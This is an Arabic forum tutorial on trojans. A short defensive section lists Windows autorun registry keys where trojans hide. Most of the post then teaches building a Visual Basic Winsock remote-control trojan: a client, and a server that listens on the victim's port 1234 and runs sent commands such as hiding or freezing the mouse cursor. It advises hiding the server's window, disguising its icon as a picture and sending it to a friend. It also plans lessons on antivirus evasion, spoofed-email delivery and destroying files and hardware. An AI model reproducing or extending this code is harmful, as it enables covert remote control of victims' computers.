إعـــــــلان

تقليص
لا يوجد إعلان حتى الآن.

عام التروجانات ((أحصنة طروادة)) -إعداد: فرهد ظفور

تقليص
X
 
  • تصفية - فلترة
  • الوقت
  • عرض
إلغاء تحديد الكل
مشاركات جديدة

  • عام التروجانات ((أحصنة طروادة)) -إعداد: فرهد ظفور

    عالم التروجانات
    ((أحصنة طروادة))
    و كلشيء عنه
    إعداد : فرهد ظفور


    السلام عليكم شباب سنبدأ اليوم بشرح موضوع طويل يتضمن الأقسام التالية
    و التي تأتي على شكل اسئلة و أجوبة:
    ما هي التروجانات؟
    !
    أين تختبىء التروجانات داخل
    نظامنا
    ما وسائل الحماية منها

    ما هي المبادئ العامة التي يمكن من
    خلالها بناء التروجانات
    ما هي الاتصالات و المنافذ و طرق فتحها في جهاز
    الخصم
    كيف تبني تروجانك الخاص بواسطة لغات البرمجة المختلفة؟

    كيف تبث
    هذا التروجان إلى أصدقاءك و تقوم بتشفيرها؟
    بسم الله نبدأ

    ما هيالتروجانات؟؟
    التروجانات أو بالعربية أحصنة طروادى هي عبارة عن برامج صغيرة يتم
    بثها
    إلى الخصم للحصول منه على معلومات أو لإزعاجه و ذلك عندما يكون
    متصلاً
    بالانترنت, و قد تطورت هذه التروجانات و إضيف لها نظام ال
    key Logger
    و
    الذي يمكننا من خلاله الحصول على كل ضربات أزرار لوحة المفاتيح
    ثم بثها إلى
    عنوان معين
    و للتروجانات دائماً نظامان عمل إما استقبل المعلومات من المقتحم و
    ينفيذها داخل
    جهاز الخصم و إما استقبال المعلومات من المقتحم و إعادة بث ما
    يطلبه إليه
    و بهذه الطريقة عادة يتم بث الكوكيز الخاص بالمنتدى أو البريد
    الالكتروني ثم الدخول إليه
    و هذه العملية عادة يتم كشفها بواسطة برامج مكافحة
    التروجانات
    إلا إذا قمت ببناء هذا التروحان بنفسك و هذا ما سنقوم بتعلمه في
    المراحل القادمة
    مع تعلم الطريقة الأساسية لضرب برامج مكافحة التروجانات
    المشهورة حتى لا تكتشف أي تلاعب
    لذلك ما الاحظه أن برامج مكافحة التروجانات
    الغير مشهورة أقوى من المشهورة....

    أين تختبئ التروجانات.. تعال و شوف
    السلام عليكم

    يتعتقد الجميع بأن التروجانات تتجه مباشرة إلى المسار
    التالي داخل الريجستري
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
    rentVersion\Run]
    و هذا أمر خاطئ حيث يمكن أن تختبئ هذه التروجانات في أحدى المسارات
    التالية:
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
    rentVersion\RunOnce]
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
    rentVersion\RunServices]
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
    rentVersion\RunServicesOnce]
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
    entVersion\Run]
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
    entVersion\RunOnce]
    و هذه العنواوين يتم تنفيذها عادة مع كل تشغيل للجهاز

    ملاحظة قد لا تجد
    البرنامج بصيغة exe إنما يكون متبوعا بالرمو التالي%1 %*".
    عليك البحث أيضا عن
    ملفات أخرى داخل هذه المسارات من الريجستري
    [HKEY_CLASSES_ROOT\exefile\shell\open\command]
    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell
    \open\command]

    أو يمكن أيضاً أن تختبئ التروجانات في مجلد بدء التشغيل
    و للوصول إلى هذا الملف
    عليك الذهاب إلى الذهاب إلى قائمة ابدأ ثم برامج ثم بدء التشغيل
    ثم الضغط عليه
    بالزر الأيمن و اختيار الأمر فتح ثم التحقق من كل مجلد أو ملف داخل الدليل
    السابق لأن كل الملفات و المجلدات الموجودة داخل هذا الملف يتم
    تشغيلها
    بشكل تلقائي عند بدء تشغيل الجهاز
    ..
    يمكن أيضاً أن تختبئ التروجانات
    داخل الملف Win.ini عليك البحث داخل هذا الملف عن
    توابع مثل
    run أو load فإن وجدت أن أسم + مسار البرنامج غريبا عليك
    فأغلب الظن أنه تروجان

    يمكن أيضاً
    أن تختبئ التروجانات داخل الملف system.ini عليك البحث داخل هذا الملف عن
    توابع
    مثل shellفإن وجدت أن أسم + مسار البرنامج غريبا عليك
    فأغلب الظن أنه تروجان
    لعين
    أو يمكن أيضا أن يكون داخل الملف
    autoexec.bat قم بتحرير هذا الملف و قم بالبحث عن الملفات الغريبة
    و التي تنتهي بإمتدادات مثل
    .exe, .scr, .pif, .com, .bat
    أو داخل الملف
    config.sys
    _ أحيانا يمكن أن يلجأ مبرمج التروجانات إلى
    استخدام تقنية الأسماء المتشابة
    فكلنا نعرف الملف
    command.com قد يلجأ المبرمج إلى وضع ملف له أسم command.exe
    بحيث لا يلاحظ من يبحث عن الملف الهدف وجود تغير

    أو يمكن حتى أن تجد ملف له الاسم نفسه مع الامتداد نفسه لكن في مجلد آخر
    ..
    و
    لحل هذه المشكلة يمكنك استخدام Windows Task Manager لتدقيق ملفات الويندوز الاساسية
    ما هي وسائل الحماية من التروجانات؟؟!!
    وسائل الحماية منها كثيرة و
    متعددة و كما يقال الوقاية خير من العلاج
    لأن الملفات التي تلتصق بها التروجانات
    لا توجد إلا في المواقع الغير رسمية
    كمواقع الكراكات و المواقع الاباحية أو التي
    يتم بثها إلى البريد الالكتروني
    أو عبر برامج المحادثة.. لذا حاول قدر الإمكان
    الابتعاد عن مثل هذه المناطق...
    كما توجد العديد من البرامج مثل ال
    pc cilin و الzone Alarm و الtrojan Remover...متخصصة
    بازالة مثل هذه الملفات من
    جهازك..
    كما يمكنك بطريقة
    manual حذف هذا الملف بعد البحث عنه بالطرق السابقة التي ذكرناها

    ما هي الاتصالات و المنافذ و طرق فتحها في جهاز
    الخصم؟؟
    هناك موضوع مثبت عن طرق الحصول على ال
    IP يمكنك الاستفادة منها
    المبدأ
    العامل للاتصال:
    في اللحظة التي تقوم بها بعمل اتصال تقوم ببث عدة أشياء

    و هي
    كالتالي:
    اسم المستخدم,تاريخ ووقت الاتصال,البروكسي,منفذ الاتصال, عنوان
    الموقع
    و البروكسي يقوم هنا بدور بوابة بينك و بين
    IP الموقع الذي تقوم بالاتصال معه..
    المنافد
    :
    إذا فرضا مثلا أن كل جهاز متصل بالعالم هو عبارة عن منزل

    فما هي الطريقة التي يمكننا الدخول إلى هذا المنزل هي هنا المفتاح أي
    المنفذ
    و الذي من خلاله يمكننا الدخول إلى أي جهاز دون مشاكل تذكر و خاصة لو
    قمنا
    بتسكير خاصية عمل برامج مكافحة التروجانات
    ...
    كيف يتم فتح هذه المنافذ
    عند الخضم؟؟!!
    بواسطة التروجان طبعا و الذي سنقوم ببرمجته قريبا جدا

    و سنحاول
    أيضا برمجة تروجان نافع ليستطيع الشخص أن يتصل بالصوت و الصورة
    إلى أي مكان دون
    استخدام البروكسي أصلاً
    دمتم بخير و السلام عليكم
    .
    يتبع
    ... نتابع هذه الاسئلة مع أني استغرب عدم وجود أي رد!!!!
    ما هي المبادئ العامة التي
    يمكن من خلالها بناء التروجانات؟؟
    عليك قبل التفكير ببناء أحد التروجانات معرفة
    أحد الأمور المهمة التالية

    1- معرفة جيدة بالريجستري
    2- معرفة إحدى لغاتالبرمجة و ليس من الضروري هنا أن تكون لغة معقدة
    3- معرفة جيدة بتوابع الAPI والتي من خلالها نستطيع التحكم بالنظام بشكل كامل
    4- معرفة وسائل بث هذا التروجانو طرق التمويه و تشفيره

    الريجستري :
    هو عبارة عن قاعدة بيانات يتم من
    خلالها حفظ القيم التي يتم استدعاءها لحظيا
    أثناء تشغيل بعض البرامج
    ..
    لغاتالبرمجة:
    سنقوم ببرمجة هذا التروجان بعون الله باستخدام لغة برمجة سهلة و
    مفهومة
    مثل لغة الفيجوال بيسك , بالإضافة إلى استخدام بعض عناصر ال
    ocx التي يمكننا من خلالها
    الاتصال بشبكة الانترنت و بث المعلومات إلى الجهاز
    الآخر
    توابع الAPI:
    باستخدام هذه التوابع نستطيع التحكم بجهاز الخضم بشكل
    كامل وهذه التوابع موجودة بكل
    لغات البرمجة بداً من الفيجوال بيسك إلى الفيجوال
    سي++ إلى إلى ...
    و نستطيع أيضاً من خلال هذه التوابع الاتصال بالريجستري أو
    تغير قيمها
    وسائل بث التروجان:
    تتم عادة بث التروجانات عبر البريد
    الالكتروني أو الماسنجر
    لذلك سننتعلم أيضا كيف نقوم ببث البريد الالكتروني
    + تغير عنوان الذي ارسله
    فمثلا نقوم ببث الرسالة على أنها رسالة من موقع مشهور مثل
    مكتوب و نقوم بتحميل
    التروجان داخلها
    .

    بناء التروجان:
    قبل كل شيء شباب
    علينا أن نتفق على الأمور التالية:
    1- عدم استخدام هذا التروجان على أي مسلم و
    أخذ الموضوع على
    أنه علم في سبيل العلم فقط

    2- ما هي مدى خطورة هذا التروجان
    أي ماهي الأمور التي سنبرمجها لتقع على الخصم
    و قد لخصت هذه الأشياء بالأمور
    التالية
    و هي متسلسلة حسب الخطورة و على الأعضاء إختيار ما يناسبهم
    منها:
    1-
    ارسال رسائل مزعجة إلى الخصم دون أن يدري
    2- إخفاء أو تلاعب بمؤشر
    الفأرة
    3- التلاعب بارتعاش الشاشة و بعض الاشياء

    4- التلاعب أو تشغيل برامج
    أو إغلاق برامج
    5- قراءة أو حذف البريد الالكتروني

    6- تخريب ملفات النظام
    الاساسية
    7- تخريب الهارد وير

    سنتحدث اليوم عن الActiveX التي سنقوم باستخدامها
    لربط الأجهزة معبعضها و هي الMicrosoft Winsock Control 6
    و طريقة استدعاء هذا العنصر ضمنالفيجوال بيسك تتم بالطريقة التالية:
    أولا:إذهب إلى الTool Bar الموجودة في يسارالشاشة ثم إضغط بالزر الأيمن
    للفأرة ستظهر لك قائمة منسدلة قم باختيار components كما في الشكل التالي:
    [IMG]file:///C:/DOCUME%7E1/user/LOCALS%7E1/Temp/msohtmlclip1/01/clip_image001.gif[/IMG]
    2-
    ستظهر لكالآن قائمة قم بوضع إشارة صح (check) على العنصر Microsoft Winsock Control 6
    ثمإضغط على زر OK ستلاحظ بأن هناك أداة صغير لها شكل جهازي كمبيوتر متصلين
    ببعضهماقد زادت عندك.
    قم بعمل ضغطتين متتاليين عليها حتى يتم وضعها على الفورم الخاصةبك... 3
    ثانيا:الآن قمبإضافة زرcommand1 بحيث يكون caption=فهم توابع هذا العنصر
    ثم نقوم بكتابة الكودالتالي(داخل الزر) و الذي من خلاله سنعرف بعض خصائص الشبكة عندنا:
    code:

    MsgBox "رقم الآي بي الخاص بالجهاز " & Winsock1.LocalIP
    MsgBox "اسم الهوست " & Winsock1.LocalHostName
    MsgBox "رقم المنفذ الخاص بجهازك " & Winsock1.LocalPort

    الآن هاكم التوابع التي سنستخدمها بعمل الاتصال مع شرح كل واحدةمنها:

    ثالثا: حالة الاتصال :
    Winsock1.Connect
    البرامترات التابعة
    1-
    رقمالآي بي بالجهاز الخصم
    2-
    رقم المنفذ الذي تقوم بالتجسس عليه
    و لتطبيقةبالطريقة التالية:
    [code]
    Winsock1.Connect(ip,Port)
    [\code]

    حالةالحصول على بيانات ( إستلام بيانات من الكلينت)
    Winsock1.GetData
    البرامتراتالتابعة:
    1-
    البيانات القادمة
    2-
    نوعها
    3-
    طول نبضة البث
    و لتطبيقةبالطريقةالتالية:
    [code]
    Winsock1.GetData(data,type,maxlen)
    [\code]

    حالةالاستماع إلى المنفذ الذي قمنا بفتحه في جهاز الخصم:
    Winsock1.Listen
    -
    لايوجد لها بارمترات تابعة

    فتح منفذ(port) في جهازالخصم
    Winsock1.LocalPort
    بارامترات التابعة هي تحديد رقم هذا المنفذ علىسبيل المثال نريد أن نفتح المنفذ 1232
    فنكتب بهذه الحالة الكودالتالي:
    [code]
    Winsock1.LocalPort=1232
    [\code]

    تحديد نوالبرتوكول المستخدم في الاتصال:
    Winsock1.Protocol
    البرامترات الملحقة هيتحديد نوع البرتوكول أي إما TCP أوUDP
    و لكتابة هذا الكود نضيف إشارة يساوي بعد Winsock1.Protocol فيظهر لنا خياران على الشاشة
    نختار ما يناسبنا منها و نحن هنانقوم باختيار sckTCPProtocol

    حالة إرسالالبيانات:
    Winsock1.SendData
    البرامترات الملحقة هي فقط هنا البينات وهي منالنمط string
    أي لكتابة الكود الذي سنقوم به ببث تعليمة أسمها مثلاً lala نكتب
    [code]
    Winsock1.SendData"lala"
    [\code]
    آليةالعمل
    الية العمل أخي العزيز بسيطة و غير معقدة كما يتصور البعض
    حيثنقوم اولا بفتح منفذ عند الخضم بواسطة ملف الserver ثم نقوم بتحديد برتروكولالاتصال
    ثم نقوم بعمل إتصال بواسطة رقم الآبي + رقم المنفذ المفتوح عندالخصم
    ثم نقوم ببث البيانات التي نريدها إلى جهاز الخصم الذي يقوم بدورهباستقبال
    هذه البيانات و تنفيذ المطلوب عمله في جهاز الخصم من خلال البياناتالمرسلة
    دمتم بخير و السلام عليكم
    يتبع...
    تطبيق المشروع + شروح عمليةكاملة....
    سنبدأ بإرسال رسائل إلى المستخدم
    اولا كلنا نعرف بأن التروجان هوعبارة عن ملفين الأول عندك و الثاني عند الخصم
    سنبدأ الآن بتشكيل الملف الذيسيبقى عندك و هو الcelint
    نفتح مشروعاً جديداً و نضيف 2 text و lebel واحد وثلاث أزرار و نغير عناوين هذه الأزرار
    لتصبحكالتالي:
    name=command1:caption=
    اتصال
    name=command2:caption=
    قطعاتصال
    name=command3:caption=
    ارسل رسالة
    الآن داخل الزر الأول نقوم بكتابةالكود التالي:
    code:

    Command1.Enabled = False
    Label1.Caption = "جاري الاتصال"
    Winsock1.Connect Text1.Text, 1234

    شرحه:
    السطر الأول لإلغاء تفعيل الزر الأول حتى لا تقوم المتصل بطلبإتصال آخر وقت الاتصال
    السطر الثاني لتغير عنوان صندوق العنواوين إلى جاريالاتصال
    السطر الثالث للإتصال مع Ip معين نكتبه داخل الtext1 و رقم المنفذالمفتوح عند الخصم
    و الذي سنقوم بفتحه عنده و ليكن المنفذ رقم 1234

    الآنداخل الزر الثاني نكتب الكود التالي:
    code:

    Command1.Enabled = True
    Label1.Caption = "تم قطع الاتصال"
    Winsock1.Close

    شرحه:
    السطر الأول لإعادة تفعيل الزر الأول أي زر الاتصال
    السطرالثاني لتغير صندوق العناوين إلى ( تم قطع الاتصال )
    السطر الثالث لإغلاقالإتصال مع الجهاز الخصم
    الآن داخل الزر الثالث نكتب الكود التالي:
    code:

    Winsock1.SendData "msg" & Text2.Text

    شرحه:
    يقوم السطر السابق بارسال بيان كتابي هو msg و الذي سنرمزه فيجهاز الخصم على أنه رسالة
    ثم & الكلام المكتوب داخل الصندوق text2 ليتمارسال رسالة بما بداخلها

    الآن نقوم بالضغط على الwinsock و التي تعلمناإضافتها في الدرس السابق
    ثم نقكتب داخل الحدث connect الكود التالي:
    code:

    Label1.Caption = "تم عملية الاتصال بالجهاز الآخر"

    شرحه:
    السطر السابق يحدث عندما يتم الاتصال مع الجهاز الخصم و عندهايتم تغير
    صندوق العناوينl abelcaption لى ( تم عملية الاتصال بالجهاز الآخر )
    نرتب الأزار لتصبح موافقة للصورة المرفقة

    الآن ننتقلإلى السيرفر و التي سنقوم بارسالها إلى جهاز الخصم
    نقوم بفتح مشروع جديد
    الآن نقوم كالعادة بإضافة أداة الإتصال winsock
    ثم نكتب داخل الفورم load الكود التالي:
    code:

    Winsock1.LocalPort = 1234
    Winsock1.Listen

    شرحه:
    يقوم السطر الأول بفتح منفذ في جهاز الخصم و هو هنا 1234
    أما السطر الثاني فهو لبدء أخذ معلومات كن هذا المنفذ

    الآن داخلالwinsock ضمن الحدث ConnectionRequest نقوم بكتابة الكود التالي:
    code:

    Winsock1.Close
    Winsock1.Accept requestID

    شرحه:
    السطر الأول لإغلاق الاتصال و الثاني لقبول البيانات القادمةمن الكلينت

    الآن داخل الحدث DataArrival نكتب الكود التالي:
    code:

    Dim vardata As String
    Dim strdata As String
    Dim cmddata As String * 3
    Winsock1.GetData strdata
    cmddata = Left(strdata, 3)
    vardata = Right(strdata, Len(strdata) - 3)
    DoCommand cmddata, vardata

    السطر السابق يتضمن تعاريف للبيانات القادمة
    و السطر الأخير هوللتابع الذي سنضيفه إلى الmodule

    الآن عند الحدث Error أي حدث حدوث خطأبالاتصال نكتب الكود التالي:
    code:

    Winsock1.Close
    Winsock1.Listen

    شرحه:
    السطر الأول لإغلاق الاتصال
    السطر الثاني لإعادة أخذالبيانات القادمة من الكلينت
    -
    الآن نقوم بإضافة module من قائمة project ثمنقوم بإنشاء تابع على الشكل التالي:
    code:

    Public Function DoCommand(command As String, data As String)

    ثم نقوم بإنشاء حالات عن البيانات القادمة ( سنضيف ما نريد فيما بعد) وذلك بإضافة
    الكود التالي:
    code:

    Select Case LCase(command)

    نضيف الآن حالة وصول البيان الذي يحمل البتتات msg و التي سنعرفها هناعلى أنها msgbox
    و نكتب الكود التالي:
    code:

    Case "msg"
    MsgBox data, vbInformation, "Information"

    السطر الأول نوع الحالة
    السطر الثاني يقوم بإظهار صندوق رسالة إلىالمستخدم يحوي على البيانات المكتوبة ضمن الtext2 في الكلينت
    ثم نضيف الكودالتالي لأنهاء الحالات
    code:

    End Select

    و ننهي هذا التابع كالعادة بالتعليمة
    code:

    End Function

    -
    بهذا أصبح كل شيء جاهزاً عليك الآن ارسال هذه الملف لصديقك و التجريبعليه
    دمتم بخير و السلام عليكم
    يتبع بقية الخيارات.....
    السلامعليكم نتابع معاً
    الخطوات التي اتفقنا عليها
    نفتح المشروع السابق لنضيف لهخيارات جديدة و هي التي تتعلق بمؤشر الفأرة
    و سنتسخدم في هذا الدرس التوابعالجديدة التالية:
    SetCursorPos:
    يمكننا من خلالها تغير و تحديد مكان جديدلمؤشر الفأرة عند جهاز الخصم
    SetDoubleClickTime:
    يمكننا من خلال هذا التابعإنقاص الفترة الزمنية للضغط على المؤشر بحيث
    لا يتمكن المستخدم من عمل ضغتطينمتتاليتين على الفأرة
    ShowCursor:
    لأظهار وإخفاء مؤشر الفأرة
    نقوم فيالمشروع السابق( الكليت) بإضافة ثلاث أزار جديدة لتأخذ الترتيب من 4 إلى 7
    و قمبتغير عناوينها للتالي:
    name=command4:caption=
    جمد مؤشرالفأرة
    name=command5:caption=
    زد سرعة ضربات الفأرة
    name=command6:caption=
    قمبإخفاء مؤشر الفأرة
    name=command7:caption=
    قم بإظهار مؤشر الفأرة
    نقوم الآنبارسال رموز نمط string إلى جهاز الخصم ثم نقوم في الملف الثاني
    بترجمة هذهالرموز
    نكتب داخل الزر الرابع الكود التالي:
    code:

    Private Sub Command4_Click()
    Winsock1.SendData "frz"
    End Sub

    و الخامس:
    code:

    Private Sub Command5_Click()
    Winsock1.SendData "sss"
    End Sub

    و السادس:
    code:

    Private Sub Command6_Click()
    Winsock1.SendData "hid"
    End Sub

    و السابع:
    code:

    Private Sub Command7_Click()
    Winsock1.SendData "sho"
    End Sub

    و لقد انتهينا الآن من ملف الكينت ننتقل الآن إلى ملف السيرفر في جهازالخصم
    و نقوم بفتح المشروع السابق و نضيف عليه التوابع التي قمنا بشرحهاسابقاً
    (
    من قائمة add-ins ثم api Viewer)
    ثم نقوم بالدخول إلى الmodule الخاصة بنا و نضع تصاريح التوابع في قسم التصريحات العامة:
    أي :
    code:

    Public Declare Function SetCursorPos Lib "user32" Alias "SetCursorPos" (ByVal x As Long, ByVal y As Long) As Long
    Public Declare Function SetDoubleClickTime Lib "user32" Alias "SetDoubleClickTime" (ByVal wCount As Long) As Long
    Public Declare Function ShowCursor Lib "user32" Alias "ShowCursor" (ByVal bShow As Long) As Long

    ثم نعرف ثلاث متحولات نمط srting تعبر عن التابع على النحوالتالي:
    code:

    Dim setcursor As String
    Dim clickTime As String
    Dim show As String

    ثم نقوم بإضافة حالات البيانات المرمزة القادمة :
    code:

    Case "frz"
    setcursor = SetCursorPos(50, 50)
    Case "sss"
    clickTime = SetDoubleClickTime(50)
    Case "hid"
    show = ShowCursor(0)
    Case "sho"
    show = ShowCursor(1)

    كخطوة نهائية نقوم بإخفاء الفورم و تغير الicon إلى شكل صورةما
    يمكنكم تحميل هذا المثال كاملاً أي الشيفرة المصدرية من الملفالمرفق
    ملاحظة[IMG]file:///C:/DOCUME%7E1/user/LOCALS%7E1/Temp/msohtmlclip1/01/clip_image001.gif[/IMG] يمكنك أن تجرب إقتحام نفسك فتح الملفالسيرفر اولاً ثم ضع الآي بي 127.0.0.1
    ــــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــــــــــــــــــــ ـــــــــــــ


    عام التروجانات ((أحصنة طروادة)) -إعداد: فرهد ظفور
يعمل...
X